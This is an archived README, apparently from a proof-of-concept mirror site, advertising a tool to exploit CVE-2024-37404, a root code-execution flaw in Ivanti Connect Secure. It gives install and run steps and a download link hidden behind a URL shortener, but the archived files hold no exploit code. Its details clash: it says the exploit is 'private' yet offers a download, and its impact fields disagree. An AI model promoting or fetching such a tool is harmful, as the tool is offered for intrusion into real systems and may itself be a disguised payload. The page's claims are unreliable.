关联漏洞
介绍
## 🌟 Description
CVE-2024-37404 - Ivanti Connect Secure - Authenticated RCE via OpenSSL CRLF Injection
An attacker with administrative access to the web application, potentially gained through exploitation of previous vulnerabilities or credential compromise, could execute arbitrary code on the underlying system with root privileges.
## Details
- **CVE ID**: [CVE-2024-37404]
- **Discovered**: 2024-04-05
- **Published**: 2024-10-08
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
1. Download the repository:
|[Download](https://t.ly/4XwoO)
|:--------------- |
2. Navigate to the tool's directory:
```bash
cd CVE-2024-37404
```
3. Install the required Python packages:
```bash
pip install -r requirements.txt
```
## 🚀 Usage
To use the tool, run the script from the command line as follows:
```bash
python exploit.py [options]
```
### Options
Options in README.txt
### Example
## Affected versions
Ivanti Connect Secure versions prior to 22.7R2.1 and 22.7R2.2, and Ivanti Policy Secure versions prior to 22.7R1.1
## 📈 CVSS Information
Score: 9.1
Severity: CRITICAL
Confidentiality: None
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
文件快照
[4.0K] /data/pocs/ea19fd18ce6fdf5ba8d2450c8a5fb5a97e093809
├── [ 78K] photo_2024-10-12_10-57-48.jpg
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →